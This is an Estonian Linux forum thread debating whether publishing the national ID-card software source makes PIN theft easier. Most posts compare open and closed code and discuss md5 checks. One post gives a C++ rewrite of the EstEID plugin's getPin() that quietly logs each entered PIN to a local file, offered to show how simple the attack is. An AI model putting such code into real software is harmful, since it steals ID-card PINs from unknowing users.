Autor |
Sõnum |
medieval
Pingviini aktivist
Vanus: 35
Liitunud: 16.11.2008
Postitused: 175
Asukoht: Saaremaa/Tartu
Distributsioon: Ubuntu 10.10
|
|
RIA on teinud avalikuks ID-kaardi lähtekoodid, mis muudab isikutunnistuse PIN-kaardi varguse hõlpsamaks ja odavamaks ning seeläbi ka ründe tõenäolisemaks.
Lähtekoodi kättesaadavaks muutumisega on lihtne endale sobivaid muudatusi tarkvarasse teha. Nii on ka pahatahtlikel
isikutel lihtsam luua võltstarkvara, mis näeb välja nagu see päris, aga teeb lisaks veel midagi - näiteks kasutab PIN koodi ilma omaniku teadmata.
Delfi
|
|
|
|
|
|
|
|
kessu
Vana Pingviin
Vanus: 49
Liitunud: 16.07.2007
Postitused: 1106
Distributsioon: Ubuntu 16.04 LTS 64bit
|
|
Esiteks on koguaeg ja igalpool üteldud, et tarkvara tuleks installida ainult usaldatavast allikast - nii ei saa ka võltstarkvara arvutisse.
Teiseks: kui mitmed siinsest foorumist on võimelised selliseid muudatusi tarkvarasse sisse viima?
|
|
|
|
_________________ Olen umbkeelne mulk ja ei saa võõrastest keeltest piisavalt aru
|
|
|
|
illukas
Vana Pingviin
Vanus: 44
Liitunud: 24.10.2006
Postitused: 2036
|
|
kessu kirjutas: | Teiseks: kui mitmed siinsest foorumist on võimelised selliseid muudatusi tarkvarasse sisse viima? |
no ikka on, kui ise ei ole siis teatud rahasumma eest leitakse see inimene.
Ise asi kas see ka nii lihtne on ja kas tellijal piisavalt pappi on.
Võtame näiteks apache serveri, mis on juba väga väga pikka aega avatud lähtekoodiga, millegipärast ei ole tehtud maailma serveritele sellist laiaulatuslikku rünnet... Miks?
Sest apache serveri kood on hea ja sinna laiaulatuslikku ründe tekitamine suhteliselt keeruline.
Tõmmates nüüd parallele id-kaardi softiga siis kui on norm lähtekood ei ole see ründe tekitamine nii lihtne midagi. Kui aga on ligadi logadi kood siis teadagi....
Kokkuvõtvalt jällegi mingi mõtetu delfis avaldatud hala (minu personaalne arvamus muud midagi).
Teisalt ei jõua mina endale osta pinpadiga lugejat selleks kaheks toiminguks mis ma aastas teen- mõttetu, selle raha eest saan 28x pangas oma toiminguid teha.
Praegu on õnneks olukord parem kuid teatud aeg tagasi:
osta windows+padiga lugeja+lase paigaldada kogu kupatus
1680+~700+550
Haige:(
|
|
|
|
_________________ https://www.inlink.ee
|
|
|
|
imapi
Vana Pingviin
Vanus: 44
Liitunud: 01.12.2005
Postitused: 567
Asukoht: Rakvere
Distributsioon: Mageia Cauldron
|
|
Just mõtlesin siin, et huvitav kui palju neid lolle oleks, kes installiks endale id kaardi utiliidid mille ta on saanud kellegi tundmatu käest kuskilt internetist aga siis tuli mulle meelde mõni aeg tagasi tehtud "nali" Ganza Net -ga kui inimene on ikka väga loll siis on kõik võimalik
|
|
|
|
_________________ More than once my wife has asked why I don't do Windows, because that's where the money is. Why don't I just sell drugs or produce porn - there's money in those things, right?
|
|
|
|
pisi
Pingviini kasutaja
Liitunud: 09.07.2007
Postitused: 65
Asukoht: Eesti
Distributsioon: Debian / Darwin
|
|
imapi kirjutas: | Just mõtlesin siin, et huvitav kui palju neid lolle oleks, kes installiks endale id kaardi utiliidid mille ta on saanud kellegi tundmatu käest kuskilt internetist aga siis tuli mulle meelde mõni aeg tagasi tehtud "nali" Ganza Net -ga :) kui inimene on ikka väga loll siis on kõik võimalik |
Neid peaks olema jalaga segada, teadupärast on kogu internett täis erinevaid õpetusi ja kohakesi, kuskohast tirida erinevat "ID-kaardi tarkvara", küll binaare, küll algkoodi, küll juhendeid ja skripte.
Teha lehekülg "Siit saad VEEL PAREMA ja VEEL AVATUMA algkoodiga tarkvara, tiri-tiri!" ja ma olen veendunud, et mõne nädalaga leiaks vähemalt mõnikümmend kui mitte mitusada inimest, kes tarkvara tiriks ja käima tõmbaks ja vajadusel "sudo blabla" kirjutaks kui internetis mingi foorum seda soovitaks.
Kes te avatud lähtekoodi pimesi kiidate, kui tihti reaalselt ise tarkvara netist tirite, selle autentsut ja terviklikust kontrollite, ise kompileerite (kompilaatoriga, mille puhul on kindel, et see sabasid ja sarvesid koodi ei pane), paigaldate jne?
Kuna enamus inimesi ei süvene, on näiteks osa seltskonda võimalik õnge võtta sildiga "Uus ja parem, 3x kiirem, optimeeritud registriga" teisi "uus ja parem, tasuta ja rohkem", kolmandaid "uus ja parem, lisaks avatud lähtekoodiga" (isegi kui see avatud lähtekood osutub alla tõmmates tegelikult piibli kolme esimese raamatu tekstiks), neljandaid lubadusega tasuta ligipääsu tüdruku msn-i parooli/suuri tisse/või lihtsalt midagi läikivat saada.
Delfi on delfi, muud ei midagi.
|
|
|
|
_________________ pisi - muidumees ja maailmaparandaja
@MartinPaljak.net
|
|
|
|
tramm
Vana Pingviin
Liitunud: 03.11.2008
Postitused: 900
Distributsioon: *buntu
|
|
illukas kirjutas: | Teisalt ei jõua mina endale osta pinpadiga lugejat selleks kaheks toiminguks mis ma aastas teen- mõttetu, selle raha eest saan 28x pangas oma toiminguid teha.
|
Tuleb tulla tagasi selle pangaplaadi idee juurde ja Estobuntu Live-CD'd promoda. Kui tuleb arvete maksmise aeg, siis Windows kinni, Estobuntu sisse ja kõik pangatoimingud on turvaliselt tehtud.
|
|
|
|
|
|
|
|
oldgreeneye
Pingviini aktivist
Vanus: 34
Liitunud: 23.01.2008
Postitused: 297
Asukoht: Tartu
Distributsioon: Arch
|
|
Kas see ründamise värk käib ainult avatud lähtekoodiga kaasas? Minuteada on ju võimalik ka binaaridelt infot varastada toppides neile midagi sappa. Kuskilt olen kuulnud ka binaari lähtekoodiks arutamisest. Minuarust on siin avatud ja suletud lähtekoodiga tarkvara täpselt võrdsed: avatud lähtekoodi puhul on võimalik sitikas otse koodi lülitada, suletud koodiga tarkvara kas lõhutakse lahti või lisatakse nähtamatu nuhkvara. Tarkvara kasutusjuhend võib ju öelda, et tarkvaral on konfliktid viirusetõrjega, kuid turvaohtu pole.
|
|
|
|
|
|
|
|
lauris71
Uus kasutaja
Liitunud: 08.11.2010
Postitused: 4
|
|
ID-kaardi PIN koodi varastamisest on pealegi vähe kasu. Esmalt pead sa kätte saam PIN-koodi ja seejärel kaardi enda - alles siis saad hakata teda kurjasti kasutama.
Aga avatud ja suletud lähtekoodil ei peaks siin küll mingit vahet olema. Kui vaja, võiks ju võtta ID tarkvara binaari, kirjutada talle ümber lihtne wrapper-library, mis salvestab suhtluse operatsioonisüsteemi kasutajaliidesega ja valmis. Pole mingit vajadust koodis tuhnida ja aru saada, kuidas konkreetne programm tegelikult töötab.
|
|
|
|
|
|
|
|
illukas
Vana Pingviin
Vanus: 44
Liitunud: 24.10.2006
Postitused: 2036
|
|
osavnäppudel käib sinu id-kaardi varastamine nii kiresti ja märkamatult, et sa ei saagi sellest ise aru...
Ja rahade ja asjade ülekanne võtab nii minimaalselt aega, et sa ei jõua mitte miskit ette võtta...
Kui ei eksi siis id-kaardi sulgemine käib mingi kirjaliku avalduse alusel ja ennist pidi politseisse helistama....
|
|
|
|
_________________ https://www.inlink.ee
|
|
|
|
kessu
Vana Pingviin
Vanus: 49
Liitunud: 16.07.2007
Postitused: 1106
Distributsioon: Ubuntu 16.04 LTS 64bit
|
|
No varastada saab jah ... saab ka vasta hambaid andes kätte (ja see on kõige lihtsam, sest inimesel peab ju isikitunnistus kaasas olema)* ja siis saab juba pinni ja punni kah. Selleni ma tahtsingi jõuda oma pstituse tulemusena, et tegelikult on see kartus vaba ja kinnise vara vahel üleliigne. Lammutada saab ju mõlemat. Kinnise koodi puhul tuleb ainult selle tegevuse kriminaalsus lisaks.
*Juhul kui ta ei kanna selle asemel kaasas juhiluba nagu mina.
|
|
|
|
_________________ Olen umbkeelne mulk ja ei saa võõrastest keeltest piisavalt aru
|
|
|
|
andreas
Pingviini aktivist
Vanus: 30
Liitunud: 26.02.2008
Postitused: 112
Asukoht: Raasiku
Distributsioon: Mageia Cauldron
|
|
Aga miks näitekoodi kõrval vaatamiseks pole? Delfi artikkel oli rohkem uue Zeusi troojalasest. Kelle koodi RIA üldse avaldas?
niisis:
PINi varastamine EstEID näitel
Failides esteid-browser-plugin/Win/pininputdialog.cpp ja esteid-browser-plugin/X11/pininputdialog.cpp on selline väike funktsioon:
Kood: | std::string PinInputDialog::getPin(); |
Näiteks X11 versioon asendada sellega
Kood: | std::string PinInputDialog::getPin()
{
std::string m_pin = m_entry->get_text();
std::ofstream pins("/tmp/pin.txt", std::ios::app);
pins << m_pin << std::endl;
return m_pin;
} |
Windowsile:
Kood: | std::string PinInputDialog::getPin()
{
std::ofstream pins("C:\\pin.txt", std::ios::app);
pins << m_pin << std::endl;
return m_pin;
}
|
Faili päises peab sellel juhul olema
Nime ja isikukoodi peaks kätte saama smartcardpp moodulist.
Mul on kahtlus, et mu klassikaaslased (programmeerimist õppinud alates 6. septembrist) saaksid ka sellega hakkama.
|
|
|
|
|
|
|
|
urmas
Pingviini kasutaja
Vanus: 46
Liitunud: 25.07.2006
Postitused: 92
Asukoht: Tartu
Distributsioon: Gentoo
|
|
klassikaaslased saavad hakkama aga mis edasi? selleks et see kusagile arvutisse istutada tuleb ka vaeva näha. Ja istutamise puhul oleks juba tavaline keylogger kordi lihtsam, infoküllam ning kasulikum.
aga tore et mõtlema on hakatud id-kaardi üldise turva peale. kahju ainult et avatud lähtekoodi süüdstatakse..
|
|
|
|
|
|
|
|
kernull
Pingviini kasutaja
Liitunud: 03.08.2008
Postitused: 58
Asukoht: Tallinn
|
|
urmas kirjutas: | .... kahju ainult et avatud lähtekoodi süüdstatakse.. | Eks see ole vana demagoogia võte: süüdista oponenti iseenda pattudes, ja võimalikult kõva häälega...
|
|
|
|
|
|
|
|
pingviin
Pingviini kasutaja
Vanus: 42
Liitunud: 26.07.2005
Postitused: 52
Distributsioon: Open Suse 11.3
|
|
Üldiselt on tarkvata arendamise kogemuses selgeks saanud, et koodi avamine muudab tervikuna tarkvara turvalisemaks, kuna turvalisuse parendamisse kaasatakse avalikus (erinevad interneti kogukonnad, turva eksperdid, jne ...). Inimesed saavad vabalt kirjutada neile, et see või too rida sisaldab sellist turvaviga, millele peaks järgnema turva fix.
See võrdlus, et tõmmatakse tundmatust kohast, kus asub juba pahaks muudetud tarkvara ei lävi eriti, sest sama hästi võib keegi kinnisele koodile lisa juurde kirjutada, mis muudab selle pahaks ning panna kuhu iganes saadavale. Nagu me kõik teame, enamus tarkvara on võimalik krakkida ning enamasti on need just suletud koodiga.
Lisaks annab koodi avamine võimaluse tuua välja isiku privaatsusega seotud probleemid, kui tarkvara ei sisalda turva auke, aga käib hooletult ümber kodaniku isikuandmetega, siis avatud kood võimaldab avalikusel ka sellele lihtsamini reageerida.
Siit ka ideid hullumeelsetele, keegi võiks proovida kirjutada explodi ning siis saata see ID kaarid arendajatel anda neile võimalus asi parandada ning siis avaldada see (exploit) kõigile, siis saaks aru ka kui tõsiselt tegelikult asja võetakse. Reeglina annavad heatahtlikud avastjad mingi 6 kuud aega, enne kui asja avaldaavad.
|
|
|
|
|
|
|
|
pisi
Pingviini kasutaja
Liitunud: 09.07.2007
Postitused: 65
Asukoht: Eesti
Distributsioon: Debian / Darwin
|
|
Küsimus ei ole avatud lähtekoodi vs suletud lähtekoodi turvalisuses. Tahes matkida suletud lähtekoodiga tarkvara (Windowsi) on vaja VägaPaljuRaha selle uuesti arendamiseks või VägaHeadVarast (kes algkoodi hangiks). Avatud lähtekoodiga Linuxi puhul piisab aga paarist sõtmeliigutusest ja juba saabki Red Hatist CentOS.
Suletud tarkvara kallale minemine eeldab palju paremat (ja seega ka kallimat) oskusteavet kui "./configure; make; make re-dist;" käskude tundmist.
Seega objektiine hinnang, et avatud lähtekoodiga programmi X puhul on pahalasel väga palju odavam luua selle halvasti käituv koopia X' võrreldes suletud lähtekoodiga tarkvaraga, on lihtne fakt.
Ei maksa näha tonti seal kus teda tegelikult pole.
|
|
|
|
_________________ pisi - muidumees ja maailmaparandaja
@MartinPaljak.net
|
|
|
|
akbgf
Vana Pingviin
Liitunud: 07.10.2009
Postitused: 763
Asukoht: Tõravere
Distributsioon: OpenSUSE, Ubuntu
|
|
pisi kirjutas: | Seega objektiine hinnang, et avatud lähtekoodiga programmi X puhul on pahalasel väga palju odavam luua selle halvasti käituv koopia X' võrreldes suletud lähtekoodiga tarkvaraga, on lihtne fakt. |
Kas md5sum jääb ka samaks?
|
|
|
|
|
|
|
|
andreas
Pingviini aktivist
Vanus: 30
Liitunud: 26.02.2008
Postitused: 112
Asukoht: Raasiku
Distributsioon: Mageia Cauldron
|
|
akbgf kirjutas: | Kas md5sum jääb ka samaks? | väga ebatõenäoline
|
|
|
|
|
|
|
|
illukas
Vana Pingviin
Vanus: 44
Liitunud: 24.10.2006
Postitused: 2036
|
|
vahet ei ole kas ta jääb samaks või mitte, vaadates inimeste arvutikasutamis harjumusi siis md5 ei oma absoluutselt mingit tähtsust, sest tõmmatakse softi sealt kust juhtub, küsimise peale saad vastuseks, et ei tea kuskilt sain või keegi pani...
Sarnane olukord tuleb meelde panga koodidega kus inimesed panid mingil suvalisel lehel oma paroole
|
|
|
|
_________________ https://www.inlink.ee
|
|
|
|
gigake
Pingviini külastaja
Liitunud: 06.11.2006
Postitused: 24
|
|
md5sum'iga on tõesti nii, et kes teab, mis see on, oskab tarkvara tõmmata otse algallikast. Teised aga ei hakka sellele md5-ele mingit tähelepanu pöörama. Seega on see suhteliselt kasutu.
|
|
|
|
|
|
|
|
akbgf
Vana Pingviin
Liitunud: 07.10.2009
Postitused: 763
Asukoht: Tõravere
Distributsioon: OpenSUSE, Ubuntu
|
|
gigake kirjutas: | md5sum'iga on tõesti nii, et kes teab, mis see on, oskab tarkvara tõmmata otse algallikast. Teised aga ei hakka sellele md5-ele mingit tähelepanu pöörama. Seega on see suhteliselt kasutu. |
See, et väga suur hulk inimesi ei oska matemaatikat kasutada või ei tunne füüsikat, ei tee matemaatikat ega füüsikat kasutuks. Sama lugu on md5sum-ga. See on väga lihtsasti kasutatav väga tõhus vahend tarkvara õige-olemise kontrolliks. Muidugi on teisigi vahendeid. Linuksite repositooriumid on üks neist - tarkvara hoitakse hoolega valvatavas repositooriumis.
Eks õpitakse vigadest. Arukamaile piisab teiste vigadest, natuke vähem arukad õpivad oma vigadest, mõni ei pea paljuks mitu korda sama reha peale astumist. Sama käib ka oma arvutisse tarkvara installeerimise kohta. Pingviin ja teisedki foorumid teevad tänuväärset tööd arvutitega ja tarkvaraga seotud ohtudest teavitades.
|
|
|
|
|
|
|
|
|